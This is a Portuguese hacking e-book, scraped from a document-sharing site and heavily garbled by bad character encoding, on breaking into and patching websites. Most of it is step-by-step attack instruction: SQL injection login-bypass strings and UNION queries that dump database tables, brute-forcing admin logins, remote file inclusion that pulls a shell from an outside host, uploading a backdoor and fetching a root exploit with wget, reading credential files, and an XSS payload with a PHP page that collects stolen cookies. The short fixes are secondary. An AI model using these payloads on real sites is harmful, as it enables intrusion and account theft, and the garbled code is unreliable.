Invasão e Correção em Sites PDF

Invaso e Correo em Sites
Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca

O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso.
'ste e - ook tem como o(eti)o n$o s* a in)as$o" como tam!m a pre)en#$o e corre#$o em sites da internet.
1 Passo:
+ara se ,a&er a in)as$o ! necess-rio descorir ,a%has ou rechas" .ue ,aci%item a intrus$o" para isso usaremos scanners.
NMAP: /canner de ips" onde ,aremos o ,ingerprint
ACUNETIX: /canner de ,a%has" onde scannearemos o site em usca de ,a%has.
FingerPrint:
A.ui uscaremos ,a%has no ser)idor" atra)!s de programas desatua%i&ados.
Agora digitamos o comando nmap IP -s0 -O --)ersion-intensit1 2 para iniciar o 3ingerprint" se ne%e aparecer programas antigos"
de)emos procurar e4p%oits" um e4emp%o de pes.uisa no goog%e seria: '4p%oit Apache 5.6 . 7orma%mente e%es ser$o nas %inguagens C"
+8+" +'9:" +;T8O7" entre outros. 7o :inu4 asta digitar um comando no termina%" e4emp%o: perl e4p%.p% .
Eu no achei nada e a!ora" Ca%ma" n$o nos demos por )encidos ainda" agora )amos achar )u%nerai%idades no site.
Correo: <antenha sempre os programas atua%i&ados" ou %igue para seu host noti,icando o programa )u%ner-)e% e pe#a corre#$o.
Scan:
7essa etapa )amos usar o scanner no)amente" s* .ue desta )e& o de )u%nerai%idades" no nosso caso o Acuneti4.
O Acuneti4 ! para =indows" mas )oc> pode tentar emu%a-%o no wine ou
procurar um programa sustituto para :inu4. Caso ha(a a%guma ,a%ha de)emos
e4p%ora-%a" o .ue nos %e)a ao pr*4imo passo.
Robots.txt:
'ste ar.ui)o da ordens para os uscadores e as )e&es re)e%a ,icheiros
ocu%tos o de administra#$o.
7orma%mente este te4to ,ica na pasta principa% do site e4:
www.site.com/roots.t4t . 'nt$o procuramos os ar.ui)os .ue est$o dissa%ow.
Ex:
User-agent: Googlebot
Disallow: /admin
'nt$o )amos nesse diret*rio" ! a area
administrati)e do site" n*s podemos
e4p%orar do seguinte modo:
SQL Injection Basico:
'sse tipo de ata.ue e4p%ora uma ,a%ha no /?:.
8- casos em .ue o programador se distrai e escre)e o c*digo )u%ner-)e%" .ue entrando com as sctrings:
C#di!o $ulner%vel: &ista de Strin!s
@magem imasters.com.r
%ogin: AorB6 ou AorCDB
senha: AorB6 ou AorCDB
A or A6EDB6
A or 6D6
AorCDB
A or AaBDFa
AG or HAaBDFa
Correo:

6- Co%ocar magicI.uotesIgcp para On
Com esta op#$o ser- co%ocado um escape antes dos HFG nos parJmetros:
-COOK@'
-+O/T
-L'T
5- Msar m1s.%Irea%IescapeIstringHG
3a& escape nas strings m1s.%I.uer1 usadas
N- 0a%idar os parJmetros en)iados pe%os usu-rios
$usuarioIid D HintG$IL'TOFusuarioIidFPQ
O $usuarioIid ser- sempre um integer e poderemos contro%ado os dados en)iados pe%os usu-rios.

Brute-Force:
A t!cnica Rrute-3orce chuta o %ogin e a senha .ue est$o em uma %ista at! acertar. 'ssas %istas Hword%istsG podem chegar a
giga1tes" ou se(a" mi%hSes e mi%hSes de %ogins e senhas.
Tois programas muito nusados s$o o Rrutus H=indowsG e o T8C 81dra H:inu4G:
Tutoria% Rrutus Correo:
Rom" )amos usa-%o para o .ue n*s .ueremos" entrar na -rea admin.
T1pe: Co%o.ue o tipo de cone4$o .ue .ueremos .uerar"
8ttp Rasic ! para p-ginas n$o aseadas em ,ormu%-rios.
8ttp 3orm ! para p-ginas aseadas em ,ormu%-rios.
Mse Msername: <ar.ue se ,or pedido nome de usu-rio.
/ing%e Mser: <ar.ue se )oc> u.er pegar a senha de s* um usu-rio.
Mser 3i%e: Onde esta o %ista de %ogins.
+ositi)e Authentcation 9esu%ts: <ostra as senhas .ue )oc> pegou.
Tutoria% 81dra: http://www.1outue.com/watchU)D@%K6VTg5oTw

+ara %o.uear esse ata.ue de)emos %imitar o numero de sumits
.ue cada usu-rio pode ,a&er:

WUphp
$paginaD$IL'TOXpaginaXPQ
// Autor: Tanie% de /ousa 7ascimento
//0eri,ica se a string passada possui a%gum trecho in)a%ido
//Caso tenha mostra uma mensagem de erro
i,HeregiHXhttpYwwwY,tpY.datY.t4tYwgetX" $paginaGG
Z
echo XOps[ +ro%emas na p-gina[XQ
///e a )aria)e% passada esti)er dentro das normas" e4ecuta o
e%se aai4o:
\e%seZ
i,H[empt1H$paginaGG Z
@inc%ude HX$pagina.phpXGQ
\e%seZ
@inc%ude HXcapa.phpXGQ
\
\
U]
'epois de e(plorar a %rea administrativa do site vamos )uscar mais *U+S
PHP Injection:
+8+ @n(ection ou 9emote 3i%e @nc%usion e4p%ora o uso incorreto da ,un#$o inc%ude no +8+.
C#di!o $ulner%vel: 'm um site )u%ner-)e% podemos inc%uir um e4p%oit" podendo ,a&er um de,ace" ou at!
ownar.
<?php
$pagina=$_GET!pagina!"#
in$l%de&$pagina'
?(
'4emp%o: http://phpin(.noads.i&/inde4.phpUpaginaD " in(etamos uma she%% assim:
http://phpin(.noads.i&/inde4.phpUpaginaDhttp://she%%.com /c^^.t4t " o resu%tado seria:
C#di!o Se!uro:
<?php
$pagina=$_GET!pagina!"#
// )%tor: Daniel de *o%sa +as$im
ento
i,&eregi&!http-www-
,tp-.dat-.txt-wget!/ $pagina''
0 e$ho !1ps2 3roblemas na p4gina
2!#5else0
i,&2empt6&$pagina'' 0
7in$l%de &!$pagina.php!'#
5else0
7in$l%de &!$apa.php!'#
5
5
?(
, -ue .a/er se no tenho permiss0es" 0oc> de)e ir ao caminho /tmp/" %- norma%mente h-" ,a#a up%oad de uma ackdoor"
,a%aremos de%a no pr*4imo capitu%o.
Backdoor:
Rackdoor Htam!m conhecido por +orta dos ,undosG ! uma ,a%ha de seguran#a .ue pode e4istir em um programa de computador ou
sistema operaciona%" .ue pode permitir a in)as$o do sistema por um cracker para .ue e%e possa oter um tota% contro%e da m-.uina.
<uitos crackers uti%i&am-se de um Rackdoor para insta%ar )_rus de computador ou outros programas ma%iciosos" conhecidos como
ma%ware.
Wikipdia
7esse tutoria% )ou ensinar a pegar o r``t no %inu4.
O pessoa% (- de)e ter a%gum conhecimento em Te,acer e (- ter uma /he%% Mpada no /er)idor. Ok ent$o )amos %-.
:emrando" )oc> precisa ter acesso para ,a&er o up%oad de um ackdoor.
3a#a o up%oad do )ac1door.
E(ecute o comando: chmod aaa ackdoor
H7o caso ackdoor ! o ar.ui)o upado" se )oc> upou com nome de F %o% F )oc> precisa dar o comando F chmod aaa %o% G
A!ora e(ecute o comando: ./ackdoor H7ome do Rackdoor" igua% citado a cimaG
@r- aparecer a porta da cmd H/he%%G e )ai mostrar a )ers$o do kerne% e se tem 4%p pra )ers$o.
Agora pegue o ip do Servidor.
A)ra o CM' e di!ite: ping -t www.ositeaserrootado.com.r
Ara o Putt2 e co%o.ue o @+ e a porta mostrada na she%%.
Agora )oc> est- conectado a she%% upada no /er)idor.
Agora ! s* rodar o 4%p da )ers$o " e4ecute pe%a she%% mesmo.
Tepois de ter achado o 4%p para )ers$o" ,a#a o up%oad de%e pe%a she%% e:
E(ecute:
cd/)ar/tmp Htmp ! um diret*rio" poderia ser .ua%.uer outroG
wget 4p%.p% H+oderia ser .ua%.uer outro nome" esse ar.ui)o ! o 4%p" ,a#a o up%oad de%eG
depois chmod 4%p.p%
./4p%
r``ted.
Agora )oc> tem acesse tota%.
0oc> pode encontrar o 4%p para )ers$o em www.mi%w`rm.com
Autor: 3E(pl4it5
Correo: Mse sempre um om Anti)_rus e um 3irewa%%" pois e%a ser- incapacitada pe%o 3irewa%% e remo)ida pe%o Anti)_rus.
Loca Fie !iscosure:
C#di!o $ulner%vel: :oca% 3i%e Tisc%osure ou :3T permite )er os ar.ui)os do sistema" em como seus
WUphp
// +ostado por A%%<eida
$ar.ui)oD $IL'TOFar.ui)oFPQ
$read,i%eD read,i%eH$ar.ui)oGQ
U]
c*digos-,onte.
'u gra)ei esta )_deo au%a: http://www.1outue.com/watchU)DA1+)bcaciVc " mas
)ou ,a&er um tutoria% para )oc>s.
/e )oc> ,i&er arir uma pagina com o c*digo ,onte WUphp echoX9ona%doXQ U] no
na)egador )ai aparecer apenas 9ona%do. Atra)!s dessa ,a%ha e%e )ai mostrar
WUphp echoX9ona%doXQ U] ent$o n*s )amos ,a&er com .ue mostre as senhas" ao pegarmos uma p-gina igua% d do c*digo )u%ner-)e%
in(etamos o c*digo pagina.phpUar.ui)oDadmin/inde4.php e )eremos o c*digo ,onte" norma%mente e%e )ai ,a&er uma cone4$o com o
anco de dados e e4iira a%go como WUphp inc%udeHFconectar.phpFGQ U] ent$o )amos na p-gina conectar.php" in(etando e%e no)amente
pagina.phpUar.ui)oDadmin/inde4.php e ent$o e%e ira e4iir o %ogin para o anco de dados" e4emp%o:
'nt$o temos todos os dados para entrar no anco de dados" asta %ogar no
site" pe%o +8+<1Admin" .uase todos os ser)ers tem:
www.site.com.r/phpm1admin ou www.site.com.r/pma.
8- )-rios (eitos de se e4p%orar essa )u%nerai%idade" o outro seria se a
pagina de administra#$o n$o ,osse com anco de dados" ai apareceria:
Sistema de &o!in Sem *anco de 'ados
WUphp
i,H $%ogin [D nomeIadmin YY $senha [D senhaIadmin G Z
///e ,or di,irente" retonar a mensagem:
echo X:ogin e senha incorretosXQ
///e ,or iguais os dados" corretos" aparece a p-gina:
\e%seZ
%ogado
U]
'm .ue o nome de usu-rio seria: nomeIadmin e senha: senhaIadmin.
P%!ina 'e Cone(o Com *anco 'e 'ados
WUphp
$host D X%oca%hostXQ
$user D XnomeIdoIusuarioXQ
$senha D XsenhaIdoIusuarioXQ
$dname D XnomeIdoIdXQ
//conecta ao anco de dados
m1s.%IconnectH$host" $user" $senhaG or dieHXerroXGQ
//se%eciona o anco de dados
m1s.%Ise%ectIdH$dnameGor dieHXerroXGQ
U]
Correo: +ostado por A%%<eida
WUphp i, H$IL'TOFar.ui)oFPDD Xprincipa%XGZ read,i%eHXprincipa%.phpXGQ \ e%seZ echoHXWcenter]W]A#$o 7$o +ermitidaW/]W/center]XGQ \ U]
"ross Site Scri#ting:
C// ou e// roua cookies e permiti usa-%os como se ,osse o usu-rio origina% da.ue%e cookie.
7este artigo do site: http://www.inw-seguranca.com/wordpress/UpD^64 " h-
dois )ideos de como e4p%orar esta )u%nerai%idade" mas a.ui )ai um tutoria%:
Xss para redirecionar:
A%guns sites possuem murais" ou comentarios .ue permitem 8T<:" ne%es ao
digitar o c*digo:
Wscript t1peDXte4t/(a)ascriptX]
window.%ocation.hre,DXhttp://seusitehack.comXQ
W/script]
'nt$o ao )er a p-gina e%e sera redirecionado para http://seusitehack.com
Ao rou)ar coo1ies para o sistema voc6 e o usu%rio ori!inal
Xss Para 7ou)o de Coo1ies:
Ao digitar (a)ascript:a%ertHFdocument.cookieFGQ ira aparecer uma mensagem e4iindo seus cookies" n*s .ueremos receer os do
admin" ent$o iremos criar uma p-gina php .ue nos mande:
WUphp
$cookieD$IL'TOFcookieFPQ// 3a&emos um L'T UcookieD .
$%aga%%etaD,openHXcookies.t4tX"FaFGQ// /a%)amos como cookies.t4t
n$o es.ue#a de cria8lo5
,writeH$%aga%%eta"XCookie:fnX.htm%entitiesH$cookieG.Xfnfn
fnfnXGQ
,c%oseH$%aga%%etaGQ
echoXWscript]%ocation.hre,DFhttp://goog%e.com/FQW/script]XQ//
9edirecionamos para o goog%e" )oce pode muda-%o
U]
'nt$o )amos testa-%a" escre)a a%gum comentario" ou ,a#a
um post" assim:
Wscript]document.%ocationDXhttp://%oca%host/ataac/inde4.phpU
cookieDX g document.cookieW/script]
Agora no ar.ui)o cookies.t4t )ai aparecer a%go assim:
te4to6 D te4to5 e4: cookieD admin
Para in9etar o coo1ie do administrador use o c#di!o:
9avascript:voidHdocument.cookieD XcookieD adminXGQ

7esultado:
7osso cookie esta igua% o do admin" para o sistema n*s somos
e%e" por isso conseguimos os pri)i%!gios.
S$ Injection %&an'ado:

@73O9<AT@O7I/C8'<A
Como (- e4p%i.uei para )oc>s" agora iremos capturar do anco de dados as tae%as e as co%unas do anco de dados de um site
,ict_cio.
/upomos .ue temos a seguinte not_cias:
www.site.com.r/noticias.phpUidD62
c- )imos .ue e%e est- )u%ner-)e% a /?: @n(ection e possui b co%unas. Agora iremos descorir as tae%as do site atra)!s do
in,ormationIschema" o contedo de nossa materia[
+ara isto iremos uti%i&ar um union:
www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"5"N"4"2"bg3romg@n,ormationI/chema.Ta%es
7otem .ue apareceram a%guns nmeros na te%a" no nosso caso: 5"2"N
Agora )amos ,a&er o seguinte" no %ugar destes nmeros iremos co%ocar as tae%as do in,ormationIschema" adicionando um h%imiteC:
http://www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"ta%eIname"N"4"2"bg3romg@n,ormationI/chema.Ta%esg%imit `"6
Agora )oc> )ai aumentando o %imite para 6"6 / 5"6 / N"6 / 4"6 at! encontrar a%guma tae%a tipo: admin" usuarios" user" memros.
administradores" dIadmin" dIadmin etci
0amos supor agora .ue encontramos a tae%a husuariosC em 5`"6:
http://www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"ta%eIname"N"4"2"bg3romg@n,ormationI/chema.Ta%esg%imit 5`"6
Agora iremos achar as co%unas da tae%a husuariosC:
http://www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"Co%umnIname"N"4"2"bg3romg@n,ormationI/chema.Co%umnsg=here
Ta%e.nameDBusuariosBg%imitg`"6
H:emrando .ue este m!todo n$o ,uncionar- se e4istir ,i%tragem magic .uote no siteG
Caso a ,i%tragem este(a ati)a poderemos uti%i&ar assim e )er uma por uma:
http://www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"Co%umnIname"N"4"2"bg3romg@n,ormationI/chema.Co%umnsg%imitg`"6
' ent$o ir procurando at! encontrar as co%unas: senha" usuario" username" %ogin" password" user" emai% etc
CO7C:M/jO
7este tutoria% ensinei )oc>s a descorirem as tae%as e as co%unas de um anco de dados uti%i&ando o in,ormationIschema[ Com este
m!todo )oc> n$o ! origado a ir chutando nomes de tae%as e co%unas at! encontrar e%a" ou uti%i&ar a%gum programa espec_,ico. 0oc>
,a& manua%mente. A_ est- a )erdadeira arte do /?: @n(ection[
'sta mat!ria eu ,i& agora" n$o e%aorei muito" ent$o se hou)er a%gum erro a)isem hehehe
'spero .ue todos tenham gostado e .ue e%a se(a astante ti%[
Tam!m comp%ementando outro m!todo .ue n$o co%o.uei na mat!ria:
www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"LroupIConcatHTa%eI7ameG"N"4"2"bg,romgin,ormationIschema.ta%esgwheregta%eIschemaDdataaseHG
Assim ir$o ser %istadas as tae%as
Autor: rahac1/in
"oncus(o:
A.ui aprendemos a%gumas ,a%has e ata.ues" mas tamem como nos proteger" mas ,i.ue atento" no)as )u%nerai%idades e ,a%has
aparecem a cada minuto" por isso este(a em constante procura.
Origado a todos .ue %eram esse e-ook" espero ter sido uti%" e at! a pr*4ima QG

Para sa)er mais entre em: http:::;;;5in;8se!uranca5com

Invasão e Correção em Sites PDF

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

Invasão e Correção em Sites PDF

Enviado por

Direitos autorais:

Formatos disponíveis

Invaso e Correo em Sites

Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca

Você também pode gostar